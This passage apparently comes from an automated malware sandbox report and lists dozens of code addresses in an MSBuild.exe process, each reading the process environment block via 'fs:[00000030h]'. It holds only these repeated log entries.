            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013D739A mov eax, dword ptr fs:[00000030h]5_2_013D739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013D739A mov eax, dword ptr fs:[00000030h]5_2_013D739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A438F mov eax, dword ptr fs:[00000030h]5_2_013A438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A438F mov eax, dword ptr fs:[00000030h]5_2_013A438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014553FC mov eax, dword ptr fs:[00000030h]5_2_014553FC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137E388 mov eax, dword ptr fs:[00000030h]5_2_0137E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137E388 mov eax, dword ptr fs:[00000030h]5_2_0137E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137E388 mov eax, dword ptr fs:[00000030h]5_2_0137E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B63FF mov eax, dword ptr fs:[00000030h]5_2_013B63FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139E3F0 mov eax, dword ptr fs:[00000030h]5_2_0139E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139E3F0 mov eax, dword ptr fs:[00000030h]5_2_0139E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139E3F0 mov eax, dword ptr fs:[00000030h]5_2_0139E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h]5_2_013903E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0145539D mov eax, dword ptr fs:[00000030h]5_2_0145539D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h]5_2_0138A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h]5_2_0138A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h]5_2_0138A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h]5_2_0138A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h]5_2_0138A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h]5_2_0138A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013883C0 mov eax, dword ptr fs:[00000030h]5_2_013883C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013883C0 mov eax, dword ptr fs:[00000030h]5_2_013883C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013883C0 mov eax, dword ptr fs:[00000030h]5_2_013883C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013883C0 mov eax, dword ptr fs:[00000030h]5_2_013883C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137823B mov eax, dword ptr fs:[00000030h]5_2_0137823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143B256 mov eax, dword ptr fs:[00000030h]5_2_0143B256
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143B256 mov eax, dword ptr fs:[00000030h]5_2_0143B256
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144D26B mov eax, dword ptr fs:[00000030h]5_2_0144D26B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144D26B mov eax, dword ptr fs:[00000030h]5_2_0144D26B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B7208 mov eax, dword ptr fs:[00000030h]5_2_013B7208
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B7208 mov eax, dword ptr fs:[00000030h]5_2_013B7208
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430274 mov eax, dword ptr fs:[00000030h]5_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C1270 mov eax, dword ptr fs:[00000030h]5_2_013C1270
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C1270 mov eax, dword ptr fs:[00000030h]5_2_013C1270
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A9274 mov eax, dword ptr fs:[00000030h]5_2_013A9274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01384260 mov eax, dword ptr fs:[00000030h]5_2_01384260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01384260 mov eax, dword ptr fs:[00000030h]5_2_01384260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01384260 mov eax, dword ptr fs:[00000030h]5_2_01384260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137826B mov eax, dword ptr fs:[00000030h]5_2_0137826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01386259 mov eax, dword ptr fs:[00000030h]5_2_01386259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01455227 mov eax, dword ptr fs:[00000030h]5_2_01455227
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137A250 mov eax, dword ptr fs:[00000030h]5_2_0137A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B724D mov eax, dword ptr fs:[00000030h]5_2_013B724D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01379240 mov eax, dword ptr fs:[00000030h]5_2_01379240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01379240 mov eax, dword ptr fs:[00000030h]5_2_01379240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013902A0 mov eax, dword ptr fs:[00000030h]5_2_013902A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013902A0 mov eax, dword ptr fs:[00000030h]5_2_013902A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013952A0 mov eax, dword ptr fs:[00000030h]5_2_013952A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013952A0 mov eax, dword ptr fs:[00000030h]5_2_013952A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013952A0 mov eax, dword ptr fs:[00000030h]5_2_013952A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013952A0 mov eax, dword ptr fs:[00000030h]5_2_013952A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B329E mov eax, dword ptr fs:[00000030h]5_2_013B329E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B329E mov eax, dword ptr fs:[00000030h]5_2_013B329E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014552E2 mov eax, dword ptr fs:[00000030h]5_2_014552E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED mov eax, dword ptr fs:[00000030h]5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143F2F8 mov eax, dword ptr fs:[00000030h]5_2_0143F2F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BE284 mov eax, dword ptr fs:[00000030h]5_2_013BE284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BE284 mov eax, dword ptr fs:[00000030h]5_2_013BE284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01400283 mov eax, dword ptr fs:[00000030h]5_2_01400283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01400283 mov eax, dword ptr fs:[00000030h]5_2_01400283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01400283 mov eax, dword ptr fs:[00000030h]5_2_01400283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01455283 mov eax, dword ptr fs:[00000030h]5_2_01455283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013792FF mov eax, dword ptr fs:[00000030h]5_2_013792FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013902E1 mov eax, dword ptr fs:[00000030h]5_2_013902E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013902E1 mov eax, dword ptr fs:[00000030h]5_2_013902E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013902E1 mov eax, dword ptr fs:[00000030h]5_2_013902E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014172A0 mov eax, dword ptr fs:[00000030h]5_2_014172A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014172A0 mov eax, dword ptr fs:[00000030h]5_2_014172A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h]5_2_014162A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014162A0 mov ecx, dword ptr fs:[00000030h]5_2_014162A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h]5_2_014162A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h]5_2_014162A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h]5_2_014162A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h]5_2_014162A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014492A6 mov eax, dword ptr fs:[00000030h]5_2_014492A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014492A6 mov eax, dword ptr fs:[00000030h]5_2_014492A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014492A6 mov eax, dword ptr fs:[00000030h]5_2_014492A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014492A6 mov eax, dword ptr fs:[00000030h]5_2_014492A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137B2D3 mov eax, dword ptr fs:[00000030h]5_2_0137B2D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137B2D3 mov eax, dword ptr fs:[00000030h]5_2_0137B2D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137B2D3 mov eax, dword ptr fs:[00000030h]5_2_0137B2D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF2D0 mov eax, dword ptr fs:[00000030h]5_2_013AF2D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF2D0 mov eax, dword ptr fs:[00000030h]5_2_013AF2D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h]5_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h]5_2_0138A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h]5_2_0138A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h]5_2_0138A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h]5_2_0138A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h]5_2_0138A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014092BC mov eax, dword ptr fs:[00000030h]5_2_014092BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014092BC mov eax, dword ptr fs:[00000030h]5_2_014092BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014092BC mov ecx, dword ptr fs:[00000030h]5_2_014092BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014092BC mov ecx, dword ptr fs:[00000030h]5_2_014092BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013892C5 mov eax, dword ptr fs:[00000030h]5_2_013892C5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013892C5 mov eax, dword ptr fs:[00000030h]5_2_013892C5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h]5_2_013AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h]5_2_013AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h]5_2_013AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h]5_2_013AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h]5_2_013AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BD530 mov eax, dword ptr fs:[00000030h]5_2_013BD530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BD530 mov eax, dword ptr fs:[00000030h]5_2_013BD530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390535 mov eax, dword ptr fs:[00000030h]5_2_01390535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390535 mov eax, dword ptr fs:[00000030h]5_2_01390535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390535 mov eax, dword ptr fs:[00000030h]5_2_01390535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390535 mov eax, dword ptr fs:[00000030h]5_2_01390535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390535 mov eax, dword ptr fs:[00000030h]5_2_01390535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390535 mov eax, dword ptr fs:[00000030h]5_2_01390535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h]5_2_0138D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h]5_2_0138D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h]5_2_0138D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h]5_2_0138D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h]5_2_0138D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h]5_2_0138D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B7505 mov eax, dword ptr fs:[00000030h]5_2_013B7505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B7505 mov ecx, dword ptr fs:[00000030h]5_2_013B7505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01454500 mov eax, dword ptr fs:[00000030h]5_2_01454500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BB570 mov eax, dword ptr fs:[00000030h]5_2_013BB570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BB570 mov eax, dword ptr fs:[00000030h]5_2_013BB570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B656A mov eax, dword ptr fs:[00000030h]5_2_013B656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B656A mov eax, dword ptr fs:[00000030h]5_2_013B656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B656A mov eax, dword ptr fs:[00000030h]5_2_013B656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137B562 mov eax, dword ptr fs:[00000030h]5_2_0137B562
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h]5_2_0142F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h]5_2_0142F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h]5_2_0142F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h]5_2_0142F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h]5_2_0142F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h]5_2_0142F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h]5_2_0142F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01388550 mov eax, dword ptr fs:[00000030h]5_2_01388550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01388550 mov eax, dword ptr fs:[00000030h]5_2_01388550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143B52F mov eax, dword ptr fs:[00000030h]5_2_0143B52F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01455537 mov eax, dword ptr fs:[00000030h]5_2_01455537
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h]5_2_013AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h]5_2_013AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h]5_2_013AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h]5_2_013AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h]5_2_013AF5B0
